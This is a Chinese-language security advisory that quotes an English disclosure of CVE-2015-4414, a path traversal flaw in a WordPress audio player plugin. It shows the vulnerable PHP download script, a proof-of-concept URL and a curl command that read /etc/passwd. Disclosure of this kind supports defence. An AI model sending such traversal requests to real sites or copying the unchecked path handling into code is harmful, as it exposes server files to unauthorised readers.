WordPress SE HTML5 Album Audio Player插件本地文件包含漏洞(CVE-2015-4414)发布日期:2015-06-09
更新日期:2015-06-18
受影响系统:WordPress SE HTML5 Album Audio Player <= 1.1.0
描述:
BUGTRAQ ID: 75093
CVE(CAN) ID: CVE-2015-4414
SE HTML5 Album Audio Player插件可以在网站上归档、呈现、播放mp3文件或其他HTML5音频格式文件。
SE HTML5 Album Audio Player (se-html5-album-audio-player) 1.1.0及更早版本,download_audio.php在实现上存在目录遍历漏洞,远程攻击者通过file参数内的“..”,利用此漏洞可读取任意文件。
<*来源:Larry W. Cashdollar (lwc@vapid.dhs.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
This vulnerability doesn’t require authentication to the Wordpress site.
File ./se-html5-album-audio-player/download_audio.php:
3 $file_name = $_SERVER["DOCUMENT_ROOT"] . $_GET["file"];
4 $is_in_uploads_dir = strpos($file_name, "/wp-content/uploads/");
5 // make sure it"s a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7
8 // required for IE
9 if(ini_get("zlib.output_compression")) { ini_set("zlib.output_compression", "Off"); }
10
11 // get the file mime type using the file extension
12 switch(strtolower(substr(strrchr($file_name, "."), 1))) {
13 case "pdf": $mime = "application/pdf"; break;
14 case "zip": $mime = "application/zip"; break;
15 case "jpeg":
16 case "jpg": $mime = "image/jpg"; break;
17 default: $mime = "application/force-download";
18 }
19 header("Pragma: public"); // required
20 header("Expires: 0"); // no cache
21 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
22 header("Last-Modified: ".gmdate ("D, d M Y H:i:s", filemtime ($file_name))." GMT");
23 header("Cache-Control: private",false);
24 header("Content-Type: ".$mime);
25 header("Content-Disposition: attachment; filename="".basename($file_name).""");
26 header("Content-Transfer-Encoding: binary");
27 header("Content-Length: ".filesize($file_name)); // provide file size
28 header("Connection: close");
29 readfile($file_name); // push it out
30 exit();
The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.
CVEID: 2015-4414
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://wordpress.org/plugins/se-html5-album-audio-player/
易网时代-编程资源站